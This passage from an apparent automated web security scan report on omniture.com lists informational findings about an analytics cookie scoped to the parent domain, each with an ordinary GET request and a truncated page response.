HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Thu, 03 Feb 2011 19:02:34 GMT
Cache-Control: public, max-age=14400
Last-Modified: Wed, 02 Feb 2011 19:02:34 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 19:02:34 GMT
Content-Length: 31272
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:02:34 GMT; path=/; domain=omniture.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
<title>Omniture | Insight | Channel Ma
...[SNIP]...

11.409. http://www.omniture.com/en/products/multichannel_analytics/insight_retail previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/products/multichannel_analytics/insight_retail

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:02:31 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en/products/multichannel_analytics/insight_retail HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/3; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=natural_bookmark; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092330|check#true#1296673197|session#1296673129491-732177#1296674990; s_cc=true; use207=7; s_sv_s1=1@28@a//1296661247027/13731382181; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=c4b47f0affb47cea2cd263f6285f016c;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Thu, 03 Feb 2011 19:02:31 GMT
Cache-Control: public, max-age=14400
Last-Modified: Wed, 02 Feb 2011 19:02:31 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 19:02:31 GMT
Content-Length: 32092
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:02:31 GMT; path=/; domain=omniture.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
<title>Insight for Retail | Channel An
...[SNIP]...

11.410. http://www.omniture.com/en/products/online_analytics previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/products/online_analytics

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:01:35 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en/products/online_analytics HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/3; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=natural_bookmark; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092330|check#true#1296673197|session#1296673129491-732177#1296674990; s_cc=true; use207=7; s_sv_s1=1@28@a//1296661247027/13731382181; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=c4b47f0affb47cea2cd263f6285f016c;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Thu, 03 Feb 2011 19:01:35 GMT
Cache-Control: public, max-age=14400
Last-Modified: Wed, 02 Feb 2011 19:01:35 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 19:01:36 GMT
Content-Length: 24893
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:01:35 GMT; path=/; domain=omniture.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
<title>Web Analytics | Website Statist
...[SNIP]...

11.411. http://www.omniture.com/en/products/online_analytics/digitalpulse previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/products/online_analytics/digitalpulse

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:02:06 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en/products/online_analytics/digitalpulse HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/3; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=natural_bookmark; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092330|check#true#1296673197|session#1296673129491-732177#1296674990; s_cc=true; use207=7; s_sv_s1=1@28@a//1296661247027/13731382181; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=c4b47f0affb47cea2cd263f6285f016c;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Thu, 03 Feb 2011 19:02:06 GMT
Cache-Control: public, max-age=14400
Last-Modified: Wed, 02 Feb 2011 19:02:06 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 19:02:06 GMT
Content-Length: 30768
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:02:06 GMT; path=/; domain=omniture.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
<title>Online Analytics | Web Analytic
...[SNIP]...

11.412. http://www.omniture.com/en/products/online_analytics/discover previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/products/online_analytics/discover

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:02:01 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en/products/online_analytics/discover HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/3; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=natural_bookmark; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092330|check#true#1296673197|session#1296673129491-732177#1296674990; s_cc=true; use207=7; s_sv_s1=1@28@a//1296661247027/13731382181; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=c4b47f0affb47cea2cd263f6285f016c;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Thu, 03 Feb 2011 19:02:01 GMT
Cache-Control: public, max-age=14400
Last-Modified: Wed, 02 Feb 2011 19:02:01 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 19:02:01 GMT
Content-Length: 30260
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:02:01 GMT; path=/; domain=omniture.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
<title>Omniture | Online Analytics | D
...[SNIP]...

11.413. http://www.omniture.com/en/products/online_analytics/sitecatalyst previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/products/online_analytics/sitecatalyst

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:02:01 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en/products/online_analytics/sitecatalyst HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/3; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=natural_bookmark; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092330|check#true#1296673197|session#1296673129491-732177#1296674990; s_cc=true; use207=7; s_sv_s1=1@28@a//1296661247027/13731382181; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=c4b47f0affb47cea2cd263f6285f016c;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Thu, 03 Feb 2011 19:02:01 GMT
Cache-Control: public, max-age=14400
Last-Modified: Wed, 02 Feb 2011 19:02:01 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 19:02:02 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:02:01 GMT; path=/; domain=omniture.com
Content-Length: 41289

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
<title>Online Analytics | Web Analytic
...[SNIP]...

11.414. http://www.omniture.com/en/products/online_business_optimization previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/products/online_business_optimization

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 18:58:29 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en/products/online_business_optimization HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/3; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=natural_bookmark; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092330|check#true#1296673197|session#1296673129491-732177#1296674990; s_cc=true; use207=7; s_sv_s1=1@28@a//1296661247027/13731382181; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=c4b47f0affb47cea2cd263f6285f016c;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Thu, 03 Feb 2011 18:58:29 GMT
Cache-Control: public, max-age=14400
Last-Modified: Wed, 02 Feb 2011 18:58:29 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 18:58:29 GMT
Content-Length: 23664
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 18:58:29 GMT; path=/; domain=omniture.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
<title>Online Marketing Automation Sof
...[SNIP]...

11.415. http://www.omniture.com/en/products/online_marketing_suite previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/products/online_marketing_suite

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 18:59:00 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en/products/online_marketing_suite HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/3; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=natural_bookmark; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092330|check#true#1296673197|session#1296673129491-732177#1296674990; s_cc=true; use207=7; s_sv_s1=1@28@a//1296661247027/13731382181; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=c4b47f0affb47cea2cd263f6285f016c;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Thu, 03 Feb 2011 18:59:00 GMT
Cache-Control: public, max-age=14400
Last-Modified: Wed, 02 Feb 2011 18:59:00 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 18:59:00 GMT
Content-Length: 25358
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 18:59:00 GMT; path=/; domain=omniture.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
<title>Omniture | Online Marketing Sui
...[SNIP]...

11.416. http://www.omniture.com/en/products/open_business_analytics_platform previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/products/open_business_analytics_platform

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:03:21 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en/products/open_business_analytics_platform HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/3; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=natural_bookmark; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092330|check#true#1296673197|session#1296673129491-732177#1296674990; s_cc=true; use207=7; s_sv_s1=1@28@a//1296661247027/13731382181; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=c4b47f0affb47cea2cd263f6285f016c;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Thu, 03 Feb 2011 19:03:21 GMT
Cache-Control: public, max-age=14400
Last-Modified: Wed, 02 Feb 2011 19:03:21 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 19:03:21 GMT
Content-Length: 23462
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:03:21 GMT; path=/; domain=omniture.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
<title>Omniture | Open Business Analyt
...[SNIP]...

11.417. http://www.omniture.com/en/products/open_business_analytics_platform/datawarehouse previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/products/open_business_analytics_platform/datawarehouse

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:04:02 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en/products/open_business_analytics_platform/datawarehouse HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/3; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=natural_bookmark; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092330|check#true#1296673197|session#1296673129491-732177#1296674990; s_cc=true; use207=7; s_sv_s1=1@28@a//1296661247027/13731382181; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=c4b47f0affb47cea2cd263f6285f016c;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Thu, 03 Feb 2011 19:04:02 GMT
Cache-Control: public, max-age=14400
Last-Modified: Wed, 02 Feb 2011 19:04:02 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 19:04:03 GMT
Content-Length: 22167
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:04:02 GMT; path=/; domain=omniture.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
<title>Omniture | Open Business Analyt
...[SNIP]...

11.418. http://www.omniture.com/en/products/tours previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/products/tours

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:03:58 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en/products/tours HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/3; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=natural_bookmark; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092330|check#true#1296673197|session#1296673129491-732177#1296674990; s_cc=true; use207=7; s_sv_s1=1@28@a//1296661247027/13731382181; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=c4b47f0affb47cea2cd263f6285f016c;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Thu, 03 Feb 2011 19:03:58 GMT
Cache-Control: public, max-age=14400
Last-Modified: Wed, 02 Feb 2011 19:03:58 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 19:03:58 GMT
Content-Length: 27316
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:03:58 GMT; path=/; domain=omniture.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
<title>Omniture - Online Product Tours
...[SNIP]...

11.419. http://www.omniture.com/en/products/visitor_acquisition previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/products/visitor_acquisition

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 18:59:18 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en/products/visitor_acquisition HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/3; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=natural_bookmark; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092330|check#true#1296673197|session#1296673129491-732177#1296674990; s_cc=true; use207=7; s_sv_s1=1@28@a//1296661247027/13731382181; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=c4b47f0affb47cea2cd263f6285f016c;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Thu, 03 Feb 2011 18:59:18 GMT
Cache-Control: public, max-age=14400
Last-Modified: Wed, 02 Feb 2011 18:59:18 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 18:59:18 GMT
Content-Length: 23448
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 18:59:18 GMT; path=/; domain=omniture.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
<title>Visitor Acquisition | Search En
...[SNIP]...

11.420. http://www.omniture.com/en/products/visitor_acquisition/searchcenter previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/products/visitor_acquisition/searchcenter

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 18:59:58 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en/products/visitor_acquisition/searchcenter HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/3; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=natural_bookmark; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092330|check#true#1296673197|session#1296673129491-732177#1296674990; s_cc=true; use207=7; s_sv_s1=1@28@a//1296661247027/13731382181; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=c4b47f0affb47cea2cd263f6285f016c;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Thu, 03 Feb 2011 18:59:58 GMT
Cache-Control: public, max-age=14400
Last-Modified: Wed, 02 Feb 2011 18:59:58 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 18:59:58 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 18:59:58 GMT; path=/; domain=omniture.com
Content-Length: 34152

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
<title>Search Engine Marketing, PPC Bi
...[SNIP]...

11.421. http://www.omniture.com/en/resources previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/resources

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:13:38 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en/resources HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/3; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=natural_bookmark; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092330|check#true#1296673197|session#1296673129491-732177#1296674990; s_cc=true; use207=7; s_sv_s1=1@28@a//1296661247027/13731382181; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=c4b47f0affb47cea2cd263f6285f016c;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Thu, 03 Feb 2011 19:13:38 GMT
Cache-Control: public, max-age=14400
Last-Modified: Wed, 02 Feb 2011 19:13:38 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 19:13:39 GMT
Content-Length: 31803
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:13:38 GMT; path=/; domain=omniture.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
<title>Online Business Optimization Re
...[SNIP]...

11.422. http://www.omniture.com/en/resources/articles previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/resources/articles

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

